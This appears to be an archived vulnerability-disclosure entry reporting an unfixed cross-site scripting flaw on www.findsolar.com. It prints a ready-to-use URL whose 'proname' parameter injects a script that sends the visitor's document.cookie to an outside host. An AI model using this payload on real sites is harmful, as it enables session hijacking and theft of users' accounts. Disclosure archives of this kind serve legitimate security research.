Unfixed XSS vulnerability at www.findsolar.com

2007-12-07T00:00:00
ID XSSED:12345
Type xssed
Reporter nights_shadow
Modified 2007-07-26T00:00:00

Description

Security researcher nights_shadow, has submitted on 12/07/2007 a cross-site-scripting (XSS) vulnerability affecting www.findsolar.com, which at the time of submission ranked 456919 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 26/07/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.findsolar.com/content.php?page=findacontractor&subpage=show&from=step2&findname=1&wantsolar=1&wantppa=1&wantpool=1&wantwater=1&wantair=1&wantcooker=1&wantpump=1&wantdesign=1&wantengineering=1&proname=<script>window.location='http://www.google.com/index.php?cookie='%2Bdocument.cookie;</script>